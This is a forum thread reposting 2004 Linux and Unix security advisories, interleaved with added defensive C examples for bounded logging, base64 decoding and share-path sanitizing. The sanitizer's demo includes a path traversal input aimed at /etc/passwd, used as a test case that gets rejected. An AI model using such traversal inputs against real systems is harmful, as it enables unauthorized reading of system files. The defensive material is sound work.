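    return log_bounded(msg, cap, "client sent hostnames: %s", hosts);
}

int main(void)
{
    char msg[LOG_BUF];
    bool fit = demo_dhcp_log(msg, sizeof msg);
    printf("%s%s\n", msg, fit ? "" : " [truncated]");
    return 0;
}
```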


----------



## eddie5659

A vulnerability in the e1000 driver for the Linux kernel 2.4.26 and
earlier was discovered by Chris Wright. The e1000 driver does not
properly reset memory or restrict the maximum length of a data
structure, which can allow a local user to read portions of kernel
memory (CAN-2004-0535).

A vulnerability was also discovered in the kernel where a certain C
program would trigger a floating point exception that would crash the
kernel. This vulnerability can only be triggered locally by users with
shell access (CAN-2004-0554).

*Affected versions:

10.0, 9.1, 9.2, Corporate Server 2.1,
Multi Network Firewall 8.2
*

http://www.linuxsecurity.com/advisories/mandrake_advisory-4514.html

Regards

eddie


----------



## eddie5659

A bug in mod_proxy may allow a remote attacker to execute arbitrary
code when Apache is configured a certain way.

*Affected packages

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-www/apache <= 1.3.31-r1 >= 1.3.31-r2

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4515.html

Regards

eddie


----------



## eddie5659

racoon, provided as part of IPsec-Tools, fails to do proper authentication.

*Affected packages

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-firewall/ipsec-tools < 0.3.3 >= 0.3.3

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4516.html

Regards

eddie


----------



## eddie5659

gzip contains a bug potentially allowing an attacker to execute
arbitrary commands.

*Affected packages

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-arch/gzip <= 1.3.3-r3 >= 1.3.3-r4

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4517.html

Regards

eddie


----------



## eddie5659

There is a vulnerability where a carefully crafted signal sent to the
giFT-FastTrack plugin will cause the giFT daemon to crash.

*Affected packages

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-p2p/gift-fasttrack <= 0.8.6 >= 0.8.7

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4518.html

Regards

eddie


----------



## eddie5659

FreeS/WAN, Openswan, strongSwan and Super-FreeS/WAN contain two bugs
when authenticating PKCS#7 certificates. This could allow an attacker
to authenticate with a fake certificate.

* Affected packages

| # | Package | Vulnerable | Unaffected |
|---|---------|------------|------------|
| 1 | net-misc/freeswan | < 2.04-r1 | >= 2.04-r1, == 1.99-r1 |
| 2 | net-misc/openswan | < 2.1.4 | >= 2.1.4, == 1.0.6_rc1 |
| 3 | net-misc/strongswan | < 2.1.3 | >= 2.1.3 |
| 4 | net-misc/super-freeswan | <= 1.99.7.3 | Vulnerable! |

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4519.html

Regards

eddie


----------



## eddie5659

dhcp-3.0.1rc14-1 is now available. This release fixes a
buffer overflow vulnerability in the Fedora Core 2 dhcp-3.0.1rc12-*.

*Affected products:

Product : Fedora Core 2
Name : dhcp
Version : 3.0.1rc14

*

http://www.linuxsecurity.com/advisories/fedora_advisory-4520.html

Regards

eddie


----------



## eddie5659

The kernel package contains the Linux kernel (vmlinuz), the core of your
Fedora Core Linux operating system. The kernel handles the basic functions
of the operating system: memory allocation, process allocation, device
input and output, etc.

Numerous problems referencing userspace memory were identified in several
device drivers by Al Viro using the sparse tool.

*Affected product:

Product : Fedora Core 1
Name : kernel
Version : 2.4.22

*

http://www.linuxsecurity.com/advisories/fedora_advisory-4521.html

Regards

eddie


----------



## eddie5659

Georgi Guninski discovered a buffer overflow bug in Apache's mod_proxy
module, whereby a remote user could potentially cause arbitrary code
to be executed with the privileges of an Apache httpd child process
(by default, user www-data). Note that this bug is only exploitable
if the mod_proxy module is in use.

*For the current stable distribution (woody), this problem has been
fixed in version 1.3.26-0woody5.

For the unstable distribution (sid), this problem has been fixed in
version 1.3.31-2.
*

http://www.linuxsecurity.com/advisories/debian_advisory-4522.html

Regards

eddie


----------



## eddie5659

GNATS is a freely available bug tracking system used by Unix-based operating systems. GNATS version 4.0 is vulnerable to a format string attack. A remote attacker could use this vulnerability to execute arbitrary commands on the system.

*Platforms Affected:

Various: Unix Any version 
Yngve Svendsen and Gerald Pfeifer: GNATS 4.0 *

http://xforce.iss.net/xforce/xfdb/16517

Regards

eddie


----------



## eddie5659

Pavuk is a Web content mirror program for Unix and Linux operating systems. Pavuk versions 0.9.28-r1 and earlier are vulnerable to a stack-based buffer overflow, caused by improper bounds checking in the Location: header. By sending a specially-crafted Location: header in a '305 Use Proxy' HTTP Status Code, a remote attacker, in control of a malicious Web server, could overflow a buffer and execute arbitrary code on the vulnerable system.

*Platforms Affected:

kernel.org: Linux Any version 
Pavuk Open Source Development: Pavuk 0.9.28-r1 and prior
Various: Unix Any version 
*

http://xforce.iss.net/xforce/xfdb/16551

Regards

eddie


----------



## eddie5659

The eupdatedb utility in esearch creates a file in /tmp without first
checking for symlinks. This makes it possible for any user to create
arbitrary files.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-portage/esearch <= 0.6.1 >= 0.6.2
*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4530.html

Regards

eddie


----------



## eddie5659

The kernel package contains the Linux kernel (vmlinuz), the core of any
Linux operating system. The kernel handles the basic functions
of the operating system: memory allocation, process allocation, device
input and output, etc.

During an audit of the Linux kernel, SUSE discovered a flaw in the
Linux kernel that inappropriately allows an unprivileged user to
change the group ID of a file to his/her own group ID.

*Product : Fedora Core 2
Name : kernel
Version : 2.6.6
Release : 1.435.2.3
*

http://www.linuxsecurity.com/advisories/fedora_advisory-4532.html

Regards

eddie


----------



## eddie5659

Mailman is software to help manage email discussion lists, much like
Majordomo and Smartmail. Unlike most similar products, Mailman gives
each mailing list a webpage, and allows users to subscribe,
unsubscribe, etc. over the Web. Even the list manager can administer
his or her list entirely from the Web. Mailman also integrates most
things people want to do with mailing lists, including archiving, mail
<-> news gateways, and so on.

*Name : mailman
Version : 2.1.5 
Release : 7 
Summary : Mailing list manager with built in Web access.
*

http://www.linuxsecurity.com/advisories/fedora_advisory-4533.html

Regards

eddie


----------



## eddie5659

Rsync before 2.6.1 does not properly sanitize paths when running a
read/write daemon without using chroot. This could allow a remote attacker
to write files outside of the module's "path", depending on the privileges
assigned to the rsync daemon. Users not running an rsync daemon, running a
read-only daemon, or running a chrooted daemon are not affected by this
issue.

*Name : rsync
Version : 2.5.7 
Release : 5.fc1  
Summary : A program for synchronizing files over a network.
*

http://www.linuxsecurity.com/advisories/fedora_advisory-4534.html

Regards

eddie


----------



## eddie5659

wvWare is a library designed to load and parse Microsoft Word files on Unix-based operating systems. wvWare versions 0.7.4, 0.7.5, 0.7.6, and 1.0.0 are vulnerable to a buffer overflow, caused by improper bounds checking in the DateTime field of the wvHandleDateTimePicture function in the wvWare library. If a remote attacker creates a specially-crafted document and persuades the user to open the document in HTML mode while using an application that uses the wv library, the attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the application that uses the library.

*Platforms Affected:

kernel.org: Linux Any version 
SourceForge.net: wvWare 0.7.4 through 0.7.6 
SourceForge.net: wvWare 1.0.0 
Various: Unix Any version 
*

http://xforce.iss.net/xforce/xfdb/16660

Regards

eddie


----------



## eddie5659

This update fixes several security vulnerabilities in the Linux Kernel
shipped with EnGarde Secure Linux, most notably the "fsave/frstor"
vulnerability (CAN-2004-0554) and an information leak in the e1000
driver (CAN-2004-0535).

*Guardian Digital products affected by this issue include:

EnGarde Secure Community 2
EnGarde Secure Professional v1.5
*

http://www.linuxsecurity.com/advisories/engarde_advisory-4555.html

Regards

eddie


----------



## eddie5659

PHP is a well known, widely-used scripting language often used within
web server setups.
Stefan Esser found a problem with the "memory_limit" handling of PHP which
allows remote attackers to execute arbitrary code as the user running
the PHP interpreter. This problem has been fixed. Additionally a
problem within the "strip_tags" function has been found and fixed which
allowed remote attackers to inject arbitrary tags into certain web
browsers, issuing XSS related attacks.

*Affected products:

8.0, 8.1, 8.2, 9.0, 9.1,
SuSE Linux Enterprise Server 8,
 SuSE Linux Office Server,
UnitedLinux 1.0
*

http://www.linuxsecurity.com/advisories/suse_advisory-4556.html

Regards

eddie


----------



## eddie5659

Stefan Esser discovered a remotely exploitable vulnerability in PHP
where a remote attacker could trigger a memory_limit request
termination in places where an interruption is unsafe. This could be
used to execute arbitrary code.

As well, Stefan Esser also found a vulnerability in the handling of
allowed tags within PHP's strip_tags() function. This could lead to
a number of XSS issues on sites that rely on strip_tags(); however,
this only seems to affect the Internet Explorer and Safari browsers.

*Affected versions:

10.0, 9.1, 9.2, Corporate Server 2.1,
Multi Network Firewall 8.2

*

http://www.linuxsecurity.com/advisories/mandrake_advisory-4557.html

Regards

eddie


----------



## eddie5659

A vulnerability in racoon prior to version 20040408a would allow a
remote attacker to cause a DoS (memory consumption) via an ISAKMP
packet with a large length field.

Another vulnerability in racoon was discovered where, when using RSA
signatures, racoon would validate the X.509 certificate but would not
validate the signature. This can be exploited by an attacker sending
a valid and trusted X.509 certificate and any private key. Using this,
they could perform a man-in-the-middle attack and initiate an
unauthorized connection. This has been fixed in ipsec-tools 0.3.3.

*Affected versions: 10.0
*

http://www.linuxsecurity.com/advisories/mandrake_advisory-4558.html

Regards

eddie


----------



## eddie5659

Thomas Walpuski discovered a vulnerability in the X.509 handling of
super-freeswan, openswan, strongSwan, and FreeS/WAN with the X.509
patch applied. This vulnerability allows an attacker to make up their
own Certificate Authority that can allow them to impersonate the
identity of a valid DN. As well, another hole exists in the CA
checking code that could create an endless loop in certain instances.

*Affected versions

10.0, 9.1, 9.2, Corporate Server 2.1,
Multi Network Firewall 8.2
*

http://www.linuxsecurity.com/advisories/mandrake_advisory-4559.html

Regards

eddie


----------



## eddie5659

A buffer overflow vulnerability exists in the wv library that can allow
an attacker to execute arbitrary code with the privileges of the user
running the vulnerable application.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-text/wv < 1.0.0-r1 >= 1.0.0-r1

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4560.html

Regards

eddie


----------



## eddie5659

A flaw has been discovered in 2.6 series Linux kernels that allows an
attacker to send a malformed TCP packet, causing the affected kernel
to possibly enter an infinite loop and hang the vulnerable machine.

*Affected packages
=================

| # | Kernel | Unaffected | Remerge |
|---|--------|------------|---------|
| 1 | aa-sources | >= 2.6.5-r5 | YES |
| 2 | ck-sources | >= 2.6.7-r2 | YES |
| 3 | gentoo-dev-sources | >= 2.6.7-r7 | |
| 4 | hardened-dev-sources | >= 2.6.7-r1 | |
| 5 | hppa-dev-sources | >= 2.6.7_p1-r1 | |
| 6 | mips-sources | *>= 2.6.4-r4, >= 2.6.7-r1 | |
| 7 | mm-sources | >= 2.6.7-r4 | YES |
| 8 | pegasos-dev-sources | >= 2.6.7-r1 | |
| 9 | rsbac-dev-sources | >= 2.6.7-r1 | |
| 10 | uclinux-sources | >= 2.6.7_p0-r1 | |
| 11 | usermode-sources | >= 2.6.6-r2 | |
| 12 | win4lin-sources | >= 2.6.7-r1 | |
| 13 | xbox-sources | >= 2.6.7-r1 | |
| 14 | development-sources | Vulnerable! | |

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4561.html

Regards

eddie


----------



## eddie5659

Multiple security vulnerabilities, potentially allowing remote code
execution, were found and fixed in PHP.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-php/php <= 4.3.7-r1 >= 4.3.8
2 dev-php/mod_php <= 4.3.7-r1 >= 4.3.8
3 dev-php/php-cgi <= 4.3.7-r1 >= 4.3.8
-------------------------------------------------------------------
3 affected packages on all of their supported architectures.
-------------------------------------------------------------------
*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4562.html

Regards

eddie


----------



## eddie5659

Issues have been discovered in the following protocol dissectors:

* The iSNS dissector could make Ethereal abort in some cases. (0.10.3 - 0.10.4) CAN-2004-0633
* SMB SID snooping could crash if there was no policy name for a handle. (0.9.15 - 0.10.4) CAN-2004-0634
* The SNMP dissector could crash due to a malformed or missing community string. (0.8.15 - 0.10.4) CAN-2004-0635

*Product : Fedora Core 2
Name : ethereal
*

http://www.linuxsecurity.com/advisories/fedora_advisory-4563.html

Regards

eddie


----------



## eddie5659

This announcement fixes the following vulnerabilities:

Vicam USB driver denial of service 
OSS denial of service 
ISO-9660 buffer overflow vulnerability
R128 DRI local privileges escalation 
do_fork memory leak 
Infoleak on filesystems 
Buffer overflow at panic state 
Sparse bugs

http://www.linuxsecurity.com/advisories/conectiva_advisory-4564.html

Regards

eddie


----------



## eddie5659

PHP[1] is a very popular scripting language used by web servers to
offer dynamic content.

Stefan Esser noted[2] a vulnerability[3] in php code so that a remote
attacker could force php to hit memory_limit in unsafe places which
would lead to a possible execution of arbitrary code.

He also found[4] out that the strip_tags() function, often used as a
validator for user input, could allow tags containing the null char.

*PACKAGE : php4*

http://www.linuxsecurity.com/advisories/conectiva_advisory-4565.html

Regards

eddie


----------



## eddie5659

Webmin[1] is an often used web-based administration interface for
Unix systems.

Keigo Yamazaki reported[2] a vulnerability[3] in webmin that would
allow unauthenticated users to obtain read access to a module's
configuration.

*PACKAGE : webmin*

http://www.linuxsecurity.com/advisories/conectiva_advisory-4566.html

Regards

eddie


----------



## eddie5659

Nessus is a freely available broad-spectrum vulnerability assessment tool for Unix and Linux-based operating systems. Nessus version 2.0.11 and possibly earlier versions are vulnerable to a race condition in nessus-adduser, which allows users to add a nessusd user. If the TMPDIR environment variable is not configured, a local attacker could exploit this vulnerability to gain elevated privileges on the system.

*Platforms Affected:

kernel.org: Linux Any version 
Nessus: Nessus 2.0.11 
Various: Unix Any version *

http://xforce.iss.net/xforce/xfdb/16768

Regards

eddie


----------



## eddie5659

Pavuk is a Web content mirror program for Unix and Linux operating systems. Pavuk is vulnerable to a buffer overflow, caused by a vulnerability when handling digest authentication. A remote attacker could exploit this vulnerability to overflow a buffer and execute arbitrary code on the vulnerable system, with the privileges of the user running Pavuk.

*Platforms Affected:

Gentoo Technologies, Inc.: Gentoo Linux Any version 
Pavuk Open Source Development: Pavuk Any version *

http://xforce.iss.net/xforce/xfdb/16807

Regards

eddie


----------



## eddie5659

PowerPortal is a content management portal for Unix-based platforms. PowerPortal version 1.3 is vulnerable to cross-site scripting, caused by improper filtering of user-supplied input in the private message module. A remote attacker could send a specially-crafted private message containing malicious code to the message title field, which would be executed in the victim's Web browser within the security context of the hosting site, once the message has been viewed. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.

*Platforms Affected:

John H: PowerPortal 1.3 
Various: Unix Any version *

http://xforce.iss.net/xforce/xfdb/16838

Regards

eddie


----------



## eddie5659

Oracle8i and Oracle9i database servers and Oracle Application Server version 9iAS Release 9.0.2.0.1 could allow a local attacker to gain elevated privileges on the server. By default, Oracle libraries are installed owned by oracle. A local attacker with an oracle, ias, iasr2 or iasdb account could gain root privileges on the server.

*Platforms Affected:

Hewlett-Packard Company: HP-UX Any version 
kernel.org: Linux Any version 
Oracle Corporation: Oracle8i Any version 
Oracle Corporation: Oracle9i Any version 
Oracle Corporation: Oracle9i Application Server Release 2 9.0.2.0.1 
Sun Microsystems: Solaris Any version 
*

http://xforce.iss.net/xforce/xfdb/16839

Regards

eddie


----------



## eddie5659

Two vulnerabilities were discovered in libapache-mod-ssl:

CAN-2004-0488 - Stack-based buffer overflow in the
ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl,
when mod_ssl is configured to trust the issuing CA, may allow remote
attackers to execute arbitrary code via a client certificate with a
long subject DN.

CAN-2004-0700 - Format string vulnerability in the ssl_log function
in ssl_engine_log.c in mod_ssl 2.8.19 for Apache 1.3.31 may allow
remote attackers to execute arbitrary messages via format string
specifiers in certain log messages for HTTPS.

*Package : libapache-mod-ssl*

http://www.linuxsecurity.com/advisories/debian_advisory-4609.html

Regards

eddie


----------



## eddie5659

There is a vulnerability in sendmail that can be exploited 
to cause a denial-of-service condition and could allow a 
remote attacker to execute arbitrary code with the privileges 
of the sendmail daemon, typically root.

*Vulnerable Supported Versions

System Binaries
----------------------------------------------------------------------
OpenServer 5.0.6 Sendmail distribution
OpenServer 5.0.7 Sendmail distribution	*

http://www.linuxsecurity.com/advisories/caldera_advisory-4611.html

Regards

eddie


----------



## eddie5659

tcpdump is a widely-used network sniffer.

The issues with tcpdump are present only on UnixWare 7.1.3up and
not on previous versions of UnixWare 7.1.3 or earlier, including
Open Unix 8.0.0, because the version of tcpdump in UnixWare 7.1.3
and before is 3.4a5 and it does not contain these issues.

Remote attackers could potentially exploit these 
vulnerabilities by sending carefully-crafted network packets 
to a victim. If the victim is running tcpdump, these packets 
could result in a denial of service, or possibly execute 
arbitrary code.

*Vulnerable Supported Versions

System Binaries
----------------------------------------------------------------------
UnixWare 7.1.3up /usr/sbin/tcpdump

*

http://www.linuxsecurity.com/advisories/caldera_advisory-4612.html

Regards

eddie


----------



## eddie5659

Updated sox packages that fix buffer overflows in the WAV file handling
code are now available.

*Relevant releases/architectures:

Red Hat Enterprise Linux AS version 3 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Desktop version 3 - i386, x86_64
Red Hat Enterprise Linux ES version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 3 - i386, ia64, x86_64
*

http://www.linuxsecurity.com/advisories/redhat_advisory-4613.html

Regards

eddie


----------



## eddie5659

An updated ipsec-tools package that fixes verification of X.509
certificates in racoon is now available.

*Relevant releases/architectures:

Red Hat Enterprise Linux AS version 3 - i386, ia64, ppc, ppc64, s390, s390x, x86_64
Red Hat Desktop version 3 - i386, x86_64
Red Hat Enterprise Linux ES version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 3 - i386, ia64, x86_64
*

http://www.linuxsecurity.com/advisories/redhat_advisory-4614.html

Regards

eddie


----------



## eddie5659

iDefense discovered a buffer overflow vulnerability in the wv package
which could allow an attacker to execute arbitrary code with the
privileges of the user running the vulnerable application.

*Affected versions: 10.0, 9.2
*

http://www.linuxsecurity.com/advisories/mandrake_advisory-4615.html

Regards

eddie


----------



## eddie5659

The OpenOffice.org office suite contains an internal libneon library
which allows it to connect to WebDAV servers. This internal library
is subject to the same vulnerabilities that were fixed in libneon
recently. These updated packages contain fixes to libneon to
correct the several format string vulnerabilities in it, as well as
a heap-based buffer overflow vulnerability.

*Affected versions: 10.0
*

http://www.linuxsecurity.com/advisories/mandrake_advisory-4616.html

Regards

eddie


----------



## eddie5659

Two buffer overflow vulnerabilities were found in Samba, potentially
allowing the remote execution of arbitrary code.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-fs/samba <= 3.0.4-r1 >= 3.0.5

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4617.html

Regards

eddie


----------



## eddie5659

Multiple vulnerabilities in phpMyAdmin may allow a remote attacker with
a valid user account to alter configuration variables and execute
arbitrary PHP code.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-db/phpmyadmin <= 2.5.7 >= 2.5.7_p1

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4618.html

Regards

eddie


----------



## eddie5659

SoX contains two buffer overflow vulnerabilities in the WAV header
parser code.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 media-sound/sox <= 12.17.4-r1 >= 12.17.4-r2

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4619.html

Regards

eddie


----------



## eddie5659

Samba[1] provides SMB/CIFS services (such as file and printer
sharing) used by clients compatible with Microsoft Windows(TM).

Evgeny Demidov noticed that the internal routine used by the Samba
Web Administration Tool (SWAT) to decode the base64 data during HTTP
basic authentication is subject[2] to a buffer overrun caused by an
invalid base64 character. This same code is used internally to
decode the sambaMungedDial attribute value when using the ldapsam
passdb backend and to decode input given to the ntlm_auth tool.

Another buffer overrun problem[3] has been located in the code used
to support the 'mangling method = hash' smb.conf option. Please be
aware that the default setting for this parameter is 'mangling method
= hash2' and therefore not vulnerable.

http://www.linuxsecurity.com/advisories/conectiva_advisory-4620.html

Regards

eddie
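A bounds-checked base64 decoder of the kind the SWAT/ntlm_auth fix above calls for, as an added C example that is not Samba's code: a character outside the alphabet is rejected up front instead of being used as a value, and every write is checked against the output capacity before it happens. The function names and the sample credential are constructed.

```c
/*
 * Added example (not Samba code): decoding HTTP Basic credentials without the
 * overrun the advisory describes. The decoder refuses any byte outside the
 * base64 alphabet and never writes past out_cap. Names are constructed.
 */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* 6-bit value of one alphabet character, or -1 if it is not base64 at all.
 * Using a lookup result without this check is what lets an invalid byte
 * become an out-of-range value and, downstream, an out-of-bounds write. */
static int b64_value(unsigned char c)
{
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

/* Decode a NUL-terminated base64 string into out. Returns bytes written, or
 * -1 on an invalid character, bad length or padding, or insufficient room. */
long b64_decode(const char *in, unsigned char *out, size_t out_cap)
{
    size_t len = strlen(in);
    if (len % 4 != 0) return -1;               /* base64 comes in 4-char quanta */
    size_t written = 0;
    for (size_t i = 0; i < len; i += 4) {
        int v[4];
        int pad = 0;
        for (int k = 0; k < 4; k++) {
            unsigned char c = (unsigned char)in[i + k];
            if (c == '=') {
                /* padding is legal only in the last two slots of the final quantum */
                if (i + 4 != len || k < 2) return -1;
                pad++;
                v[k] = 0;
            } else {
                if (pad) return -1;                  /* data after padding */
                v[k] = b64_value(c);
                if (v[k] < 0) return -1;             /* reject, do not index */
            }
        }
        uint32_t triple = ((uint32_t)v[0] << 18) | ((uint32_t)v[1] << 12) |
                          ((uint32_t)v[2] << 6)  |  (uint32_t)v[3];
        size_t n = 3 - (size_t)pad;
        if (written + n > out_cap) return -1;        /* bounds check first */
        out[written++] = (unsigned char)(triple >> 16);
        if (n > 1) out[written++] = (unsigned char)(triple >> 8);
        if (n > 2) out[written++] = (unsigned char)triple;
    }
    return (long)written;
}

/* Split a decoded "user:pass" credential the way a Basic-auth front end would.
 * Returns false on any decode error, missing ':' or oversized field. */
bool parse_basic_auth(const char *b64, char *user, size_t ucap, char *pass, size_t pcap)
{
    unsigned char buf[256];
    long n = b64_decode(b64, buf, sizeof buf - 1);
    if (n < 0) return false;
    buf[n] = '\0';
    char *colon = memchr(buf, ':', (size_t)n);
    if (!colon) return false;
    size_t ulen = (size_t)(colon - (char *)buf);
    size_t plen = (size_t)n - ulen - 1;
    if (ulen >= ucap || plen >= pcap) return false;
    memcpy(user, buf, ulen);  user[ulen] = '\0';
    memcpy(pass, colon + 1, plen); pass[plen] = '\0';
    return true;
}

int main(void)
{
    /* Constructed headers: a valid credential and one carrying a stray '!'. */
    const char *samples[] = { "dXNlcjpzZWNyZXQ=", "dXNl!jpz" };
    char user[32], pass[32];
    for (size_t i = 0; i < 2; i++) {
        bool ok = parse_basic_auth(samples[i], user, sizeof user, pass, sizeof pass);
        printf("%-18s -> %s\n", samples[i], ok ? user : "REJECTED");
    }
    return 0;
}
```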


----------



## eddie5659

ripMIME is an email filter, developed by Paul L Daniels, which is included as part of the XaMime and the Inflex email virus scanning utilities. ripMIME versions prior to 1.3.2.3 could allow a remote attacker to bypass email and content filters. ripMIME fails to properly extract specific MIME encoded data from an attachment, if the data consists of invalid characters. A remote attacker could exploit this vulnerability to bypass certain email and various filtering applications, such as antivirus programs.

*Platforms Affected:

kernel.org: Linux Any version 
PLDaniels: ripMIME prior to 1.3.2.3 
Various: Unix Any version*

http://xforce.iss.net/xforce/xfdb/16867

Regards

eddie


----------



## eddie5659

sharutils contains two buffer overflow vulnerabilities that could lead
to arbitrary code execution.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-arch/sharutils <= 4.2.1-r9 >= 4.2.1-r10
*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4883.html

Regards

eddie


----------



## eddie5659

A security vulnerability has been located in Samba 2.2.x <= 2.2.11 and
Samba 3.0.x <= 3.0.5. A remote attacker may be able to gain access to
files which exist outside of the share's defined path. Such files must
still be readable by the account used for the connection.

*Affected versions: Trustix Secure Linux 1.5
Trustix Secure Linux 2.0
*

http://www.linuxsecurity.com/advisories/trustix_advisory-4884.html

Regards

eddie
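The path sanitation described in the rsync post (Fedora) earlier and in this Samba post, as an added C example rather than rsync's or Samba's own code: a client-supplied path is normalised lexically, any `..` that would climb above the module/share root is rejected, and the result is joined onto a fixed root. The share root, function names and sample requests are constructed; symlinks are not resolved, which is the gap the rsync advisory notes chroot closes.

```c
/*
 * Added example (not rsync's or Samba's code): lexical sanitation of a
 * client-supplied, share-relative path so it cannot leave the share root.
 * Function names, the share root and the sample paths are constructed.
 */
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define MAX_COMPONENTS 256

/*
 * Normalise client_path into out: collapse leading and repeated slashes,
 * drop "." components, resolve ".." against components already accepted,
 * and fail if ".." would climb above the root or the result does not fit.
 */
bool sanitize_share_path(const char *client_path, char *out, size_t cap)
{
    const char *starts[MAX_COMPONENTS];
    size_t lens[MAX_COMPONENTS];
    size_t depth = 0;
    const char *p = client_path;

    if (cap == 0) return false;
    while (*p) {
        while (*p == '/') p++;                      /* skip "/" and "//" */
        if (!*p) break;
        const char *start = p;
        while (*p && *p != '/') p++;
        size_t len = (size_t)(p - start);

        if (len == 1 && start[0] == '.') continue;                 /* "." */
        if (len == 2 && start[0] == '.' && start[1] == '.') {
            if (depth == 0) return false;   /* would escape the share root */
            depth--;
            continue;
        }
        if (depth == MAX_COMPONENTS) return false;
        starts[depth] = start;
        lens[depth] = len;
        depth++;
    }

    size_t used = 0;
    for (size_t i = 0; i < depth; i++) {
        size_t need = lens[i] + (i ? 1 : 0);        /* component + separator */
        if (need >= cap - used) return false;       /* keep room for the NUL */
        if (i) out[used++] = '/';
        memcpy(out + used, starts[i], lens[i]);
        used += lens[i];
    }
    out[used] = '\0';
    return true;
}

/*
 * Join the sanitised relative path onto share_root. Because the relative part
 * has already been checked, the result is always at or below share_root.
 * Symlinks inside the share are not resolved here; that is what chroot covers.
 */
bool resolve_in_share(const char *share_root, const char *client_path,
                      char *out, size_t cap)
{
    char rel[1024];
    if (!sanitize_share_path(client_path, rel, sizeof rel)) return false;
    int n = rel[0] ? snprintf(out, cap, "%s/%s", share_root, rel)
                   : snprintf(out, cap, "%s", share_root);
    return n >= 0 && (size_t)n < cap;
}

int main(void)
{
    /* Constructed requests: one benign, one trying to climb out of the share. */
    const char *requests[] = { "docs/./reports//q1.txt", "docs/../../etc/passwd" };
    char full[256];
    for (size_t i = 0; i < 2; i++) {
        bool ok = resolve_in_share("/srv/share", requests[i], full, sizeof full);
        printf("%-24s -> %s\n", requests[i], ok ? full : "REJECTED");
    }
    return 0;
}
```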


----------



## eddie5659

"This is a maintenance release that in addition to over 50 non-critical
bug fixes, addresses a problem with GPC input processing. This release
also re-introduces ability to write GIF images via the bundled GD
extension."

*Affected versions: Trustix Secure Linux 2.1
Trustix Operating System - Enterprise Server 2
*

http://www.linuxsecurity.com/advisories/trustix_advisory-4885.html

Regards

eddie


----------



## eddie5659

Freenet6 is a client designed to configure an IPv6 tunnel to the Freenet6.net. Freenet6 could allow a remote attacker to obtain username and password information. The tspc.conf configuration file in Freenet6 is world-readable, which could allow a remote attacker to access this file and obtain username and password information that is used to connect to the IPv6 tunnelbroker Freenet6.net.

*Platforms Affected:

Debian Project: Debian Linux 3.0 
Hexago: Freenet6 Any version 
kernel.org: Linux Any version 
*

http://xforce.iss.net/xforce/xfdb/17544

Regards

eddie


----------



## eddie5659

The syscons CONS_SCRSHOT ioctl(2) does insufficient validation of
its input arguments. In particular, negative coordinates or large
coordinates may cause unexpected behavior.

*Affects:

FreeBSD 5.x releases*

http://www.linuxsecurity.com/advisories/freebsd_advisory-4904.html

Regards

eddie


----------



## eddie5659

Utilities included in old Netpbm versions are vulnerable to multiple
temporary files issues, potentially allowing a local attacker to
overwrite files with the rights of the user running the utility.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 media-libs/netpbm <= 9.12-r4 >= 10.0
*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4898.html

Regards

eddie


----------



## eddie5659

Two bugs in PHP may allow the disclosure of portions of memory and
allow remote attackers to upload files to arbitrary locations.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-php/php < 4.3.9 >= 4.3.9
2 dev-php/mod_php < 4.3.9 >= 4.3.9
3 dev-php/php-cgi < 4.3.9 >= 4.3.9
-------------------------------------------------------------------
3 affected packages on all of their supported architectures.
-------------------------------------------------------------------
*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4911.html

Regards

eddie


----------



## eddie5659

The vulnerabilities allow remote attackers to cause a denial of service of squid server services.

*Affected Products :

- Turbolinux Appliance Server 1.0 Hosting Edition
- Turbolinux Appliance Server 1.0 Workgroup Edition
- Turbolinux 8 Server
- Turbolinux 8 Workstation
- Turbolinux 7 Server
- Turbolinux 7 Workstation
*

http://www.linuxsecurity.com/advisories/turbolinux_advisory-4905.html

Regards

eddie


----------



## eddie5659

New kernels are available for Mandrakelinux 10.0 that fix the
following bugs and/or add the following enhancements:

The 2.4 kernel adds prism54 support.

